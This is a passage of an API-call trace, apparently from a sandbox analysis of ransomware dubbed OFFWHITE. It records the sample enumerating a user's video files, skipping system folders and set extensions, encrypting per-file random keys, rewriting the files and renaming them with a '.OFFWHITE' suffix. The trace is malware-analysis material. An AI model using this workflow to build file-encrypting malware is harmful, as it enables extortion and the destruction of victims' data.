(lpString1="KqOQsT0eQZ0rM.swf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.115] GetProcessHeap () returned 0x500000 [0136.115] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522080 [0136.115] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\kqoqst0eqz0rm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.116] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=19177) returned 1 [0136.116] GetProcessHeap () returned 0x500000 [0136.116] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.116] GetProcessHeap () returned 0x500000 [0136.116] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.116] GetProcessHeap () returned 0x500000 [0136.116] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.116] GetProcessHeap () returned 0x500000 [0136.116] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.116] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.116] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.116] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.116] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.116] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.116] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.116] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.116] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.116] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.117] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.117] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.117] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.117] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4ae9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.117] SetLastError (dwErrCode=0x0) [0136.117] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.120] GetLastError () returned 0x0 [0136.120] GetLastError () returned 0x0 [0136.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4be9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.120] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4ce9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.120] WriteFile (in: hFile=0x21c, lpBuffer=0x522080*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522080*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.120] GetProcessHeap () returned 0x500000 [0136.120] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4ae9) returned 0x55a7b8 [0136.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.120] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x4ae9, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x4ae9, lpOverlapped=0x0) returned 1 [0136.122] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.122] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x4ae9, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x4ae9, lpOverlapped=0x0) returned 1 [0136.128] GetProcessHeap () returned 0x500000 [0136.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.128] CloseHandle (hObject=0x21c) returned 1 [0136.129] GetProcessHeap () returned 0x500000 [0136.129] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.129] GetProcessHeap () returned 0x500000 [0136.129] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.129] GetProcessHeap () returned 0x500000 [0136.129] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.129] GetProcessHeap () returned 0x500000 [0136.129] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.129] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf" [0136.129] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf.OFFWHITE" [0136.130] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\kqoqst0eqz0rm.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\kqoqst0eqz0rm.swf.offwhite")) returned 1 [0136.130] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb616c2d0, ftCreationTime.dwHighDateTime=0x1d5e13c, ftLastAccessTime.dwLowDateTime=0xc5e91ca0, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xc5e91ca0, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x170f0, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="kzpRir.flv", cAlternateFileName="")) returned 1 [0136.130] lstrcmpiW (lpString1="kzpRir.flv", lpString2=".") returned 1 [0136.130] lstrcmpiW (lpString1="kzpRir.flv", lpString2="..") returned 1 [0136.130] lstrcmpiW (lpString1="kzpRir.flv", lpString2="...") returned 1 [0136.130] lstrcmpiW (lpString1="kzpRir.flv", lpString2="windows") returned -1 [0136.130] lstrcmpiW (lpString1="kzpRir.flv", lpString2="$recycle.bin") returned 1 [0136.131] lstrcmpiW (lpString1="kzpRir.flv", lpString2="rsa") returned -1 [0136.131] lstrcmpiW (lpString1="kzpRir.flv", lpString2="ntuser.dat") returned -1 [0136.131] lstrcmpiW (lpString1="kzpRir.flv", lpString2="programdata") returned -1 [0136.131] lstrcmpiW (lpString1="kzpRir.flv", lpString2="appdata") returned 1 [0136.131] lstrcmpiW (lpString1="kzpRir.flv", lpString2="program files") returned -1 [0136.131] lstrcmpiW (lpString1="kzpRir.flv", lpString2="program files (x86)") returned -1 [0136.131] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.131] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="kzpRir.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv" [0136.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.131] PathFindExtensionW (pszPath="kzpRir.flv") returned=".flv" [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0136.131] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0136.132] lstrcmpiW (lpString1="kzpRir.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.132] GetProcessHeap () returned 0x500000 [0136.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522090 [0136.132] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\kzprir.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.132] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=94448) returned 1 [0136.132] GetProcessHeap () returned 0x500000 [0136.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.132] GetProcessHeap () returned 0x500000 [0136.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.132] GetProcessHeap () returned 0x500000 [0136.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.132] GetProcessHeap () returned 0x500000 [0136.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.132] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.132] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.132] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.133] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.133] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.133] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.158] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.158] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.158] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.159] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.159] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.159] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.159] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x170f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.159] SetLastError (dwErrCode=0x0) [0136.159] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.161] GetLastError () returned 0x0 [0136.161] GetLastError () returned 0x0 [0136.161] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x171f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.161] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.161] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x172f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.162] WriteFile (in: hFile=0x21c, lpBuffer=0x522090*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522090*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.162] GetProcessHeap () returned 0x500000 [0136.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x170f0) returned 0x55a7b8 [0136.162] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.162] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x170f0, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x170f0, lpOverlapped=0x0) returned 1 [0136.167] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.167] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x170f0, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x170f0, lpOverlapped=0x0) returned 1 [0136.168] GetProcessHeap () returned 0x500000 [0136.168] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.168] CloseHandle (hObject=0x21c) returned 1 [0136.169] GetProcessHeap () returned 0x500000 [0136.169] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.169] GetProcessHeap () returned 0x500000 [0136.169] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.169] GetProcessHeap () returned 0x500000 [0136.169] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.169] GetProcessHeap () returned 0x500000 [0136.169] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.170] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv" [0136.170] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv.OFFWHITE" [0136.170] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\kzprir.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\kzpRir.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\kzprir.flv.offwhite")) returned 1 [0136.170] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1591d2f0, ftCreationTime.dwHighDateTime=0x1d5e088, ftLastAccessTime.dwLowDateTime=0x821fdee0, ftLastAccessTime.dwHighDateTime=0x1d5e1b3, ftLastWriteTime.dwLowDateTime=0x821fdee0, ftLastWriteTime.dwHighDateTime=0x1d5e1b3, nFileSizeHigh=0x0, nFileSizeLow=0xbbe9, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="LjBRMR KYHdS.mkv", cAlternateFileName="LJBRMR~1.MKV")) returned 1 [0136.170] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2=".") returned 1 [0136.170] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="..") returned 1 [0136.170] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="...") returned 1 [0136.170] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="windows") returned -1 [0136.170] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="$recycle.bin") returned 1 [0136.170] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="rsa") returned -1 [0136.171] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="ntuser.dat") returned -1 [0136.171] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="programdata") returned -1 [0136.171] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="appdata") returned 1 [0136.171] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="program files") returned -1 [0136.171] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="program files (x86)") returned -1 [0136.171] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.171] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="LjBRMR KYHdS.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv" [0136.171] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.171] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.171] PathFindExtensionW (pszPath="LjBRMR KYHdS.mkv") returned=".mkv" [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0136.171] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0136.171] lstrcmpiW (lpString1="LjBRMR KYHdS.mkv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.171] GetProcessHeap () returned 0x500000 [0136.171] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5220a0 [0136.171] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\LjBRMR KYHdS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ljbrmr kyhds.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.172] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=48105) returned 1 [0136.172] GetProcessHeap () returned 0x500000 [0136.172] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.172] GetProcessHeap () returned 0x500000 [0136.172] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.172] GetProcessHeap () returned 0x500000 [0136.172] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.172] GetProcessHeap () returned 0x500000 [0136.172] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.172] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.172] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.172] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.172] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.172] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.172] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.172] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.172] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.172] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.172] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.172] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.172] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.173] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbbe9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.173] SetLastError (dwErrCode=0x0) [0136.173] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.174] GetLastError () returned 0x0 [0136.174] GetLastError () returned 0x0 [0136.174] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbce9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.174] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.175] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbde9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.175] WriteFile (in: hFile=0x21c, lpBuffer=0x5220a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5220a0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.175] GetProcessHeap () returned 0x500000 [0136.175] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xbbe9) returned 0x55a7b8 [0136.175] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.175] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xbbe9, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xbbe9, lpOverlapped=0x0) returned 1 [0136.178] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.178] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xbbe9, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xbbe9, lpOverlapped=0x0) returned 1 [0136.178] GetProcessHeap () returned 0x500000 [0136.178] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.178] CloseHandle 